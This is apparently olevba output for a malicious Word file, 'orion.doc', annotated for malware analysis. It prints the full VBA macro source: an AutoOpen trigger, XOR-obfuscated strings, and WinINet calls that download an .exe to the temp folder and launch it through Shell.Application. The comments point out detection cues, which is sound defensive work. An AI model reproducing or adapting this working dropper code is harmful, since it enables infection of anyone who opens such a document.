- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- orion.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: orion.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: orion.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Entry stub: its only action is calling CALTHA (defined in PIDLE0.bas),
- ' which starts the download-and-run chain. The indirection keeps the
- ' AutoOpen handler itself looking harmless.
- Sub InIn()
- CALTHA
- End Sub
- ' AutoOpen handler: Word runs this automatically when the document is
- ' opened (olevba flags it as AutoExec above). It only forwards to InIn.
- Sub autoopen()
- InIn
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' Declared but not referenced in any of the extracted modules; looks like padding.
- Public Const C1C1C1A = "BRITTANY"
- ' WinINet imports. Each API is bound under a meaningless name (C1C1C1..C4C4C4)
- ' so the real function names only appear inside the Alias strings; these are
- ' what the olevba "Lib" and "wininet.dll" findings point at. The VBA7/Win64
- ' branch uses LongPtr for handles, the fallback branch uses Long.
- #If VBA7 And Win64 Then
- ' C1C1C1 = InternetCloseHandle: closes a session or request handle.
- Public _
- Declare _
- PtrSafe _
- Function _
- C1C1C1 Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
- ' C2C2C2 = InternetOpenA(agent, accessType, proxy, proxyBypass, flags): opens the session.
- Public _
- Declare _
- PtrSafe _
- Function _
- C2C2C2 Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
- ' C3C3C3 = InternetReadFile(hRequest, buffer, bytesToRead, bytesRead): reads response data.
- Public _
- Declare _
- PtrSafe _
- Function _
- C3C3C3 Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- ' C4C4C4 = InternetOpenUrlA(hSession, url, headers, headersLen, flags, context): opens the URL.
- Public _
- Declare _
- PtrSafe _
- Function _
- C4C4C4 Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
- #Else
- ' Same four imports with 32-bit Long handles.
- Public Declare Function C1C1C1 Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
- Public Declare Function C2C2C2 Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
- Public Declare Function C3C3C3 Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public Declare Function C4C4C4 Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
- #End If
- ' Size of the fixed-length receive buffer and the byte count passed to
- ' InternetReadFile in C16C16C16.
- Private Const BRANDI = 8162
- ' Passed to InternetOpenA as the user-agent string. A short, odd UA like this
- ' is a usable proxy-log / network detection point.
- Private Const BRANDY As String = "HAZ"
- ' InternetOpenA access type; 1 is INTERNET_OPEN_TYPE_DIRECT -- confirm against wininet.h.
- Private Const BREANA = 1
- ' dwFlags for InternetOpenUrlA; &H4000000 matches INTERNET_FLAG_NO_CACHE_WRITE
- ' (response is not written to the WinINet cache, so expect no cache artifact
- ' on disk) -- confirm against wininet.h.
- Private Const BREDA = &H4000000
- ' Downloader. Opens a WinINet session with the BRANDY user-agent, has
- ' BRITANNIA open the decoded URL, reads the response in BRANDI-byte chunks
- ' into BRIELLE, and writes those bytes to the path BREE in binary mode.
- ' BREE: destination file path (C6C6C6 builds it under the temp folder).
- ' Returns True only if at least one byte was received (BRIONY <> 0);
- ' returns False if InternetOpenA fails or the URL handle is 0.
- Public Function C16C16C16 _
- (ByVal BREE As String) As Boolean
- #If VBA7 _
- And Win64 Then
- ' BRETT = session handle, BRIANNA = URL/request handle.
- Dim BRETT As LongPtr, BRIANNA As LongPtr
- #Else
- Dim BRETT As Long, BRIANNA As Long
- #End If
- ' BRIAR receives the bytes-read count from each InternetReadFile call.
- Dim BRIAR As Long
- ' C33C33C33 is the fixed-length receive buffer; BRIELLE accumulates the body.
- Dim C33C33C33 As String * BRANDI, BRIELLE As String
- ' BRIER: file number of the output file; BRIONY: total length downloaded.
- Dim BRIER As Integer, BRIONY As Double
- ' InternetOpenA(agent, accessType, proxy, proxyBypass, flags).
- BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0)
- If BRETT = 0 Then
- Exit Function
- End If
- ' Declared and never used.
- Dim FiGaMan As Boolean
- ' BRITANNIA always returns True; its real effect is storing the
- ' InternetOpenUrlA handle in BRIANNA. The empty If just discards the result.
- If BRITANNIA(BRIANNA, BRETT) Then
- End If
- If BRIANNA = 0 Then
- BRIONY = 0
- Else
- ' First chunk. Note the entire fixed-length buffer is copied here, not just
- ' BRIAR bytes, so the dropped file can differ from the served payload if the
- ' first read was short -- relevant when hashing the artifact.
- C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
- BRIELLE = C33C33C33
- ' Keep reading until InternetReadFile reports 0 bytes.
- Do While BRIAR <> 0
- C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
- ' Junk loop: BRITT only takes 6..8, so the End is never reached. The same
- ' never-firing loop pattern recurs in every module (padding / analysis noise).
- Dim BRITT As Long
- For BRITT = 6 To 8
- If BRITT = 38 Then End
- Next BRITT
- BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR)
- Loop
- ' Write everything received to BREE as raw bytes (the olevba Open/Binary/Put findings).
- BRIONY = Len(BRIELLE): BRIER = FreeFile
- Open BREE _
- For Binary Access Write _
- Lock Write _
- As #BRIER
- Put #BRIER, _
- , BRIELLE
- ' Another never-firing junk loop (BRITTA only takes 2..3).
- Dim BRITTA As Double
- For BRITTA = 2 To 3
- If BRITTA = 37 Then End
- Next BRITTA
- Close #BRIER
- End If
- ' Close the request handle, then the session handle.
- C1C1C1 BRIANNA
- C1C1C1 BRETT
- BRIELLE = ""
- ' "Success" means something was downloaded; the caller (C6C6C6) discards it anyway.
- If BRIONY Then
- C16C16C16 = True
- End If
- End Function
- ' Wrapper around Len(); used by C8C8C8 to size its loop over the hex string.
- Public Function CANDICE(CANDIDA As String) As Integer
- CANDICE = Len(CANDIDA)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' String decoder used for every obfuscated constant in IDL4.bas.
- ' CAMERON: key string (C9C9C9). CAMILLA: hex-encoded ciphertext.
- ' For each byte pair i of CAMILLA, the byte is XORed with the key character
- ' at position ((i Mod Len(key)) + 1) and appended via Chr(). Returns the
- ' decoded plaintext. This is the routine behind the olevba "Hex Strings",
- ' "Xor" and "Chr" findings; re-running this loop offline recovers the
- ' ProgIDs, file name and URL that never appear in clear text in the document.
- Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String
- Dim CAMILLE As Integer
- Dim CAMMIE As Integer
- ' Junk loop: CAMRYN is 1..3, so "End" never executes.
- Dim CAMRYN As Double
- For CAMRYN = 1 To 3
- If CAMRYN = 32 Then End
- Next CAMRYN
- Dim CANDACE As Long
- Dim CANDI As String
- ' One iteration per byte pair; CANDICE is just Len().
- For CANDACE = 1 _
- To _
- ( _
- CANDICE _
- (CAMILLA) _
- / 2)
- ' CAMILLE = numeric value of the current two hex digits.
- CAMILLE = Val("&H" & _
- (Mid$(CAMILLA, _
- (2 * CANDACE) - 1, 2)))
- ' CAMMIE = current key byte, cycling through the key.
- CAMMIE = Asc(Mid$(CAMERON, _
- ((CANDACE Mod Len(CAMERON)) + 1), 1))
- CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
- Next CANDACE
- C8C8C8 = CANDI
- End Function
- ' Decodes C10C10C10 with key C9C9C9 and instantiates the resulting ProgID.
- ' Every method later called on this object (FileExists, DeleteFile,
- ' GetSpecialFolder) is a Scripting.FileSystemObject method, and running the
- ' XOR loop on the constant gives that ProgID, so this builds an FSO without
- ' the string ever appearing in clear text.
- Public Function C21C21C21() As Object
- Dim C22C22C22 As String
- C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
- Set C21C21C21 = CreateObject(C22C22C22)
- End Function
- ' Called from InIn (ThisDocument). After a never-firing junk loop it calls
- ' CALANTHA (M.bas), which ignores its argument, so the 89 is meaningless.
- Sub CALTHA()
- Dim CAMELLIA As Long
- Dim CANDIS As Double
- For CANDIS = 44 To 46
- If CANDIS = 32 Then End
- Next CANDIS
- CAMELLIA = 89
- CALANTHA (CAMELLIA)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Obfuscated string table. All four hex constants are decoded at run time by
- ' C8C8C8 with C9C9C9 as the XOR key, so none of the real strings show up in
- ' a plain string scan of the document.
- ' C18C18C18: ProgID created in C6C6C6 and used to .Open the dropped file;
- ' decodes to "Shell.Application" by my run of the XOR loop.
- Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D"
- ' C19C19C19: file name appended to the temp folder path in C6C6C6;
- ' decodes to "\c48.exe" by my run of the XOR loop (verify before using as an IoC).
- Public Const C19C19C19 = "6850770C1D264C56"
- ' C20C20C20: URL handed to InternetOpenUrlA in BRITANNIA; decodes to an
- ' http:// URL ending in .exe (not reproduced here -- recover it with the XOR loop).
- Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51"
- ' C10C10C10: ProgID created in C21C21C21; decodes to "Scripting.FileSystemObject".
- Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747"
- ' XOR key used by C8C8C8 (30 characters, so it cycles every 30 bytes).
- Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43"
- ' Thin wrapper: True if CAILEIGH.FileExists(CAILYN), else False.
- ' CAILEIGH is the FileSystemObject from C21C21C21; CAILYN is the path to test.
- Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
- If CAILEIGH.FileExists(CAILYN) Then
- CADY = True
- Else
- CADY = False
- End If
- End Function
- ' Opens the download URL. CALLA is the InternetOpenA session handle; the
- ' InternetOpenUrlA request handle is returned through CALIDA (ByRef).
- ' The URL is C20C20C20 decoded with key C9C9C9 and BREDA is the dwFlags
- ' value. Always returns True, even when the handle is 0 -- the caller
- ' (C16C16C16) tests the handle itself rather than this return value.
- #If VBA7 _
- And Win64 Then
- Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
- #Else
- Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
- #End If
- Dim CALLIDORA As String
- ' The URL only exists in memory, after decoding.
- CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
- ' InternetOpenUrlA(hSession, url, headers, headersLen, flags, context).
- CALIDA _
- = C4C4C4 _
- ( _
- CALLA, _
- CALLIDORA, vbNullString, _
- 0, _
- BREDA, 0)
- BRITANNIA = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO M.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/M'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns the temporary folder. On a Scripting.FileSystemObject,
- ' GetSpecialFolder(2) is TemporaryFolder, so this is where the payload lands.
- Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
- Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
- End Function
- ' Indirection layer: CALEIGH is ignored, and the string literal is also
- ' ignored by C25C25C25; the only effect is reaching C6C6C6.
- Sub CALANTHA(CALEIGH As Long)
- C25C25C25 ("CACACARDRDRDRD")
- End Sub
- ' Another pass-through: C24C24C24 is unused; just calls C6C6C6.
- Public Function C25C25C25(C24C24C24 As String)
- C6C6C6
- End Function
- ' Orchestrates the payload: create an FSO (C21C21C21), resolve the temp
- ' folder (C5C5C5), build the drop path as temp folder & decoded C19C19C19,
- ' delete any existing copy, download to it via C16C16C16, then
- ' CreateObject(decoded C18C18C18) and call .Open on the dropped file, which
- ' launches it. For defenders, the observable chain is WINWORD loading
- ' wininet.dll and making an HTTP request, a new .exe created in %TEMP%, and
- ' that .exe started from Word's process -- each is a workable detection point.
- Public Function C6C6C6()
- Dim C7C7C7 As Object
- ' FileSystemObject.
- Set C7C7C7 = C21C21C21
- Dim C11C11C11 As Object
- ' Temp folder object.
- Set C11C11C11 = C5C5C5(C7C7C7)
- Dim C15C15C15
- Dim C12C12C12
- ' Decoded file name, concatenated onto the folder object (relies on the
- ' Folder object's default property yielding its path -- confirm).
- C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
- C15C15C15 = C11C11C11 & C12C12C12
- ' If a file already exists at the drop path, delete it first.
- If CADY(C7C7C7, C15C15C15) Then
- C7C7C7. _
- DeleteFile C15C15C15
- End If
- ' Download; the Boolean result is discarded.
- If C16C16C16(C15C15C15) Then
- End If
- ' Existence check whose result is also discarded.
- If CADY(C7C7C7, C15C15C15) Then
- End If
- Dim C17C17C17
- ' Shell object (C18C18C18 decodes to "Shell.Application"); .Open on an
- ' executable path runs it.
- Set C17C17C17 = CreateObject _
- (C8C8C8 _
- (C9C9C9, C18C18C18))
- C17C17C17.Open C15C15C15
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: orion.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)